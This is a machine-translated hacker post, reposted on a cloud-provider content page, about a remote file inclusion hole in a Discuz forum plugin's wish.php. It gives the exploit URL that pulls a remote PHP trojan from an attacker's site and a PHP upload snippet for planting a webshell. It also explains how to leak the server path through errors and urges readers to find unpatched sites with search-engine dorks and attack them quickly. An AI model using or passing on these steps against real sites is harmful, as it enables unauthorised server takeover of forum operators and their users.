Discuz Plug-in vulnerability attack

Source: Internet
Author: User
PS: The words of this loophole "hacker X Files" have said n times, hehe ...
Since someone has published, also some people even use the procedure to write well, then I also announced it! Source is the ghost told me, it seems that the Big Brother Firefox found the hole, not too clear!
Discuz Forum of the Wishing Pool plugin in the DZ root directory has a wish.php file, file line fourth:
Require $discuz _root. " /include/discuzcode.func.php ';
Obviously the program does not do any filtering, a full range of remote inclusion vulnerabilities, the specific use of the method is very simple:
Http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/xxxx.txt?
Don't forget, there's a question mark.!xxxx.txt is my php trojan horse, C99shell do not know why, I did not succeed, perhaps with the operating system, I did not carefully to experiment, directly with the security of the angel of that PHP back door, but can get a "Webshell", But with the security angel that PHP back door can not upload our real webshell up, so use the following file can upload your Webshell to the site directory,
<?copy ($_files[myfile][tmp_name], "c:inetpubvhostsaidu.combscntink.php");? >
<form enctype= "Multipart/form-data" action= "" method= "POST" >
<input name= "MyFile" type= "File" >
<input value= "submitted" type= "Submit" >
</form>
How to get the actual path of the website? Very simple, directly open http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/xxxx.txt, not the last question mark, then you will find that the program error, The actual path of the website is also coming out! Modify a file in the
C:inetpubvhostsaidu.combs
For the current you want to black the actual path of this site; cntink.php is the name you need to save after uploading Webshell, whatever you take!
Save the above file as txt (other extension can also) upload to your own site, such as I named Fly.txt, now open
Http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/fly.txt?
Ok... See Upload dialog box, slowly upload your Webshell it! The path after uploading is the path you set in Fly.txt!
The above article is purely disorderly writing, who uses this method black station encounters the trouble not to seek me .... In fact, this thing should be released after the release of the patch, but not the official plug-ins, and others have hair, does not matter!
PS: To move quickly, quote a word in the group x: Baidu Google all discuz inurl:wish.php search is over, but the loophole is not mended.


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.